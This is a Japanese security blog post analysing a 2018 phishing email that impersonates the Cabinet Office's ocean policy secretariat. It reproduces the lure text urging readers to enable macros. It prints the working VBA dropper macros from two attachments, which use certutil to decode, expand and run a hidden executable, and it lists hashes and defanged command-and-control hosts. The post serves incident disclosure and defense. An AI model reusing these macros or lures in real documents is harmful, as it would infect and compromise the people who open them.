piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

2018年3月の内閣府のなりすましメールについてまとめてみた

調べてみた

2018年3月12日頃、内閣府の総合海洋政策推進事務局になりすましたメールが確認されたとの参考情報を得ました。
ここではなりすましメールの関連情報をまとめます。

詐称メールの情報

詐称メールの情報を整理すると次の通りです。

確認された時期 2018年3月12日(月)昼頃
差出人名 無し(送信元アドレスそのまま表記)
送信元アドレス ******_0****@yahoo.co.jp
件名 新旧参与会議意見書の比較
本文 **先生

大変お世話になっております。
内閣府総合海洋政策推進事務局でございます。

新旧参与会議意見書の比較につき、情報共有いたします。
よろしくご査収願います。
**拝

--------------------
内閣府総合海洋政策推進事務局
参事官補佐
** *(**** ******)
MAIL: **************@cao.go.jp
TEL: 03-6257-****
--------------------
添付ファイル 有り
  • 本文は一部マスクしています。
  • 差出人名義は実在するとみられる内閣府の人名が使われていました。
  • 送信元のYahoo!Japanのメールアドレスは本文中で差出人を騙った名前(ローマ字)がIDとして設定されていました。

添付ファイルの情報

  • メールには.doc形式の文書ファイルが添付されていました。
  • ファイル名(新旧参与会議意見書の比較)で検索してみるとなりすまされた内閣府の総合海洋政策本部の記事が引っかかりました。
    総合海洋政策本部参与会議意見書の安倍総理への手交について
  • ファイルを開くとOfficeの画像とともに次の文言が記述されており、開封者に保護モードの解除とマクロの実行が促されます。

ドキュメント上部の黄色のメッセージバーを注してください。

1.「編集を有効にする」をクリックします。
2.「コンテンツの有効化」をクリックします。

  • マクロを実行するとEXE形式のファイルが展開され、外部の通信先に接続します。
Private Sub Document_Close()
Dim ZaRmOsIFuGrHzCUw As Long
Dim HfNoBoTFzClPnIKu As String
HfNoBoTFzClPnIKu = Environ("temp") & "\UiHxUvNNtFiTaXZl"
ZaRmOsIFuGrHzCUw = ActiveDocument.Content.End
Set FzQcYhSAgUcYcNVu = ActiveDocument.Range(1, ZaRmOsIFuGrHzCUw)
Set LhEtKtONyFfQwSOp = CreateObject("Scripting.FileSystemObject")
Set JpKzRgIXpSnJuHNd = LhEtKtONyFfQwSOp.CreateTextFile(HfNoBoTFzClPnIKu, True)
JpKzRgIXpSnJuHNd.WriteLine (FzQcYhSAgUcYcNVu)
JpKzRgIXpSnJuHNd.Close
Set UwZhPzKHoBiMmRIb = CreateObject("Wscript.Shell")
UwZhPzKHoBiMmRIb.Run "cmd.exe /c certutil -decode %temp%\\UiHxUvNNtFiTaXZl %temp%\\ViLlOmGPlPmIhLHa", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c expand %temp%\\ViLlOmGPlPmIhLHa -F:* %temp%\\", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\UiHxUvNNtFiTaXZl", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\ViLlOmGPlPmIhLHa", 0, False
Set UwZhPzKHoBiMmRIb = Nothing
Set LhEtKtONyFfQwSOp = Nothing
End Sub

関連が疑われる情報

  • 作成されるファイル「vizorhtmldialog.exe」が同一ハッシュ値であるとして、別のファイル(世界経済アウトルック.doc)も確認しています。
  • このファイルは1月30日頃にVTへ初回アップロードされていました。
  • VTのアップロード時のファイル名がMIMEエンコードされていたことから、同様にメールにてまかれていた可能性が考えられます。
  • ファイルを開くとOfficeの画像とともに次の文言が記述されており、開封者に保護モードの解除とマクロの実行が促されます。

【上部の黄色のメッセージ バーが表示された状態で】

「編集を有効にする」をクリックします。その後、「コンテンツの有効化」ボタンをクリックします。

  • マクロが実行されるとファイルが展開され外部へ接続します。接続先は別でした。
Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)
DGHjIKbFRghjH.WriteLine (crHJUgVD)
DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True
uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
Set uVFTyuiVGT = Nothing
Set jIHiuHY = Nothing
End Sub

Private Sub Document_New()

End Sub

インディケーター情報

ファイル
ファイル名 ハッシュ値
新旧参与会議意見書の比較.doc 36fb6eb6c46a517391c722046c769a31283b784738f2b4ab62a4accb0528b0e0
世界経済アウトルック.doc 5788b5a50cf8057f138a585221bb55498987a3510fe4e60b38aaa803bddbe1e9
通信先
URL IPアドレス
samiratikhonova[.]camdvr[.]org 185[.]80[.]53[.]206
friendlysupport[.]giize[.]com 83[.]136[.]106[.]108
  • .を[.]の表記に変更しています。
  • IPアドレスは2018年3月13日時点の情報です。
  • IPアドレス(83[.]136[.]106[.]108)を割り当てる別のURLも存在していますが、利用されているかまでは確認できませんでいた。
    • consistent[.]ddnsgeek[.]com
    • promise[.]dynu[.]net

更新履歴

  • 2018年3月15日 AM 新規作成
  • 2018年3月15日 AM メール差出人名の箇所を修正